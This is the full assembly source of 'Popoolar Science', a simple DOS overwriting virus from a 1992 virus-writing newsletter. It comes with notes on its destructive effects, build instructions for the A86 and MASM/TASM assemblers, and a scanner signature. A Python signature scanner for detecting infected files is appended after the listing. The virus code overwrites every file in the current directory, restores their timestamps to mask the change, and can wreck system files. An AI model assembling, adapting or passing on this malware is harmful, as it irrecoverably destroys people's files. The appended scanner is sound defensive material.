;Popoolar Science virus - a very simple overwriting infector
;published in Crypt Newsletter 11, Dec. 1992. Edited by Urnst Kouch
;
;Popoolar Science is an indiscriminate, primitive over-writing
;virus which will attack all files in the current directory.
;Data overwritten by the virus is unrecoverable. Programs overwritten
;by Popoolar Science are infectious if their size does not exceed the
;64k boundary for .COM programs. .EXE's larger than this will not
;spread the virus; DOS will issue an "out of memory" message when the
;ruined program is loaded. Ruined programs of any type can only be erased
;from the disk to curb infection.
;
;If Popoolar Science is run in the root directory, the system files
;will be destroyed, resulting in a machine hang on start-up.
;
;Popoolar Science does not look for an ident-marker in infected files - it
;merely overwrites all files in the current directory repeatedly. Indeed,
;there seems no need for a self-recognition routine in such a simple
;program of limited aims.
;
;
;Popoolar Science will assemble directly to a .COM file using Isaacson's
;A86 assembler. Use of a MASM/TASM compatible assembler will require
;addition of a set of declarative statements (segment/assume, org 100h
;and an end directive naming the entry point).
;
;Virus signature suitable for loading into VIRSCAN.DAT files of TBScan,
;McAfee's SCAN and/or F-PROT 2.0x:
;[POP]
;DE B8 01 43 33 C9 8D 54 1E CD 21 B8 02 3D CD 21

nosewheel:      jmp     virubegin               ; get going

virubegin:      push    cs
                pop     ds                      ; DS = CS (.COM: all segments equal)
                mov     dx,offset msg
                mov     ah,09h                  ; Display subscription
                int     21h                     ; endorsement for Popular
                                                ; Science magazine.
                mov     dx,offset file_mask     ; load filemask for "*.*"
                call    find_n_infect           ; infect a file, no need for
                                                ; an error routine - if no
                                                ; files found, virus will
                                                ; rewrite itself.
                mov     ax,04C00h               ; exit to DOS
                int     021h

find_n_infect:  push    bp
                mov     ah,02Fh                 ; get DTA (returned in ES:BX)
                int     021h
                push    bx                      ; Save old DTA offset (ES = DS here)
                mov     bp,sp                   ; BP points to local buffer
                sub     sp,128                  ; Allocate 128 bytes on stack
                push    dx                      ; Save filemask
                mov     ah,01Ah                 ; DOS set DTA function
                lea     dx,[bp - 128]           ; DX points to buffer
                int     021h
                mov     ah,04Eh                 ; search for first host file
                mov     cx,00100111b            ; CX = read-only, hidden, system,
                                                ; archive (no directories)
                pop     dx                      ; Restore file mask
findfilez:      int     021h
                jc      reset                   ; reset DTA and get ready to exit
                call    write2file              ; Infect file!
                mov     ah,04Fh                 ; DOS find next
                jmp     short findfilez         ; find another host file
reset:          mov     sp,bp                   ; discard local buffer
                mov     ah,01Ah                 ; DOS set DTA function
                pop     dx                      ; Retrieve old DTA address
                int     021h
                pop     bp
                ret

write2file:                                     ; subroutine, writes virus over beginning of all files
                mov     ah,02Fh                 ; DOS get DTA address function
                int     021h
                mov     si,bx                   ; SI points to find-first/next record
                mov     ax,04301h               ; set file attributes
                xor     cx,cx                   ; to normal, so read-only files open for write
                lea     dx,[si + 01Eh]          ; DX points to target filename (ASCIIZ at DTA+1Eh)
                int     021h
                mov     ax,03D02h               ; open file, read/write
                int     021h                    ; do it!
                xchg    bx,ax                   ; put handle in BX
                mov     ah,040h                 ; write to file, start at beginning
                mov     cx,tailhook - nosewheel ; CX = virus length
                mov     dx,offset nosewheel     ; DX points to start of virus
                int     021h                    ; do it now!
                mov     ax,05701h               ; set file date/time
                mov     cx,[si + 016h]          ; CX holds old file time
                mov     dx,[si + 018h]          ; DX holds old file date
                int     021h                    ; restore them
                mov     ah,3Eh                  ; close file
                int     021h
exit:                                           ; exit, dummeh!
                ret

file_mask       db      "*.*",0                 ; Filemask for all files
msg             db      'PopooLar ScIencE RoolZ!$' ;Popular Science mag message
tailhook:
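;The listing above gives a 16-byte scan string and notes that the virus writes
;itself over offset 0 of every victim and then puts the original date/time back,
;so a modified-time check is useless and the only reliable indicator is the
;bytes themselves. What follows is an added example, not part of the newsletter
;and not the database format of any of the named scanners: a small Python scanner
;that reads the signature in the [NAME]/hex two-line form printed above, checks the
;head of each file in a directory for it, and (an added heuristic, not from the
;page) flags an .EXE whose MZ header is gone, which is what an overwritten .EXE
;looks like. The 4 KiB head size, the "NO-MZ-HEADER" label and the sample files
;are assumptions constructed for the example.

```python
"""Signature scanner for the Popoolar Science scan string (added example)."""
import re
import sys
import tempfile
from pathlib import Path

# The scan string exactly as printed in the listing: a [NAME] line followed by
# one line of hex bytes.
POP_SIGNATURE_TEXT = """[POP]
DE B8 01 43 33 C9 8D 54 1E CD 21 B8 02 3D CD 21"""

# The virus body is written at offset 0 of every victim, so the string sits at
# a fixed, small offset; reading a 4 KiB head is ample (assumed limit).
HEAD_BYTES = 4096


def parse_signatures(text):
    """Parse [NAME] / hex-line pairs into {name: bytes}.

    Follows only the two-line layout shown in the listing; it is not a parser
    for any named scanner's real database grammar (assumption).
    """
    sigs = {}
    name = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        header = re.fullmatch(r"\[(.+)\]", line)
        if header:
            name = header.group(1)
            continue
        if name is None:
            raise ValueError("hex bytes before any [NAME] header: %r" % line)
        sigs[name] = bytes.fromhex(line)
    return sigs


def scan_head(data, sigs):
    """Return [(name, offset)] for every signature present in data."""
    hits = []
    for name, sig in sigs.items():
        off = data.find(sig)
        if off != -1:
            hits.append((name, off))
    return hits


def scan_file(path, sigs, head_bytes=HEAD_BYTES):
    """Signature hits for one file, plus a header heuristic for .EXE files.

    An overwritten .EXE has lost its MZ header (the virus image starts with a
    jmp), so an .EXE whose first two bytes are not 'MZ'/'ZM' is flagged too.
    """
    with open(path, "rb") as f:
        head = f.read(head_bytes)
    hits = scan_head(head, sigs)
    if path.suffix.upper() == ".EXE" and head[:2] not in (b"MZ", b"ZM"):
        hits.append(("NO-MZ-HEADER", 0))
    return hits


def scan_directory(directory, sigs):
    """Scan every regular file in directory; return {filename: hits}, hits only."""
    results = {}
    for path in sorted(Path(directory).iterdir()):
        if path.is_file():
            hits = scan_file(path, sigs)
            if hits:
                results[path.name] = hits
    return results


def build_sample_dir(directory):
    """Write constructed sample files (not real infected images) for a dry run."""
    d = Path(directory)
    d.mkdir(parents=True, exist_ok=True)
    sig = parse_signatures(POP_SIGNATURE_TEXT)["POP"]
    # filler resembling a code prologue, the scan string, then a junk tail
    overwritten = b"\xEB\x00\x0E\x1F" + b"\x90" * 40 + sig + b"\xB8\x00\x4C\xCD\x21" + b"A" * 300
    (d / "VICTIM.COM").write_bytes(overwritten)
    (d / "RUINED.EXE").write_bytes(overwritten)  # an .EXE with its header gone
    (d / "CLEAN.COM").write_bytes(b"\xB4\x09\xCD\x21\xB8\x00\x4C\xCD\x21" + b"B" * 100)
    (d / "CLEAN.EXE").write_bytes(b"MZ" + b"\x00" * 62 + b"C" * 100)
    return d


def demo():
    """Build the sample directory in a temp location and scan it."""
    return scan_directory(build_sample_dir(tempfile.mkdtemp()),
                          parse_signatures(POP_SIGNATURE_TEXT))


if __name__ == "__main__":
    target = Path(sys.argv[1]) if len(sys.argv) > 1 else None
    report = scan_directory(target, parse_signatures(POP_SIGNATURE_TEXT)) if target else demo()
    for fname, hits in report.items():
        for name, off in hits:
            print(f"{fname}: {name} at offset {off:#x}")
```

;Run it with a directory argument to scan real files, or with none to scan the
;constructed samples. Because the string is matched against the file head rather
;than the whole file, the check stays cheap even on large .EXE files, and the
;offset reported should be the same for every victim of this particular infector,
;which is itself a useful sanity check on a hit.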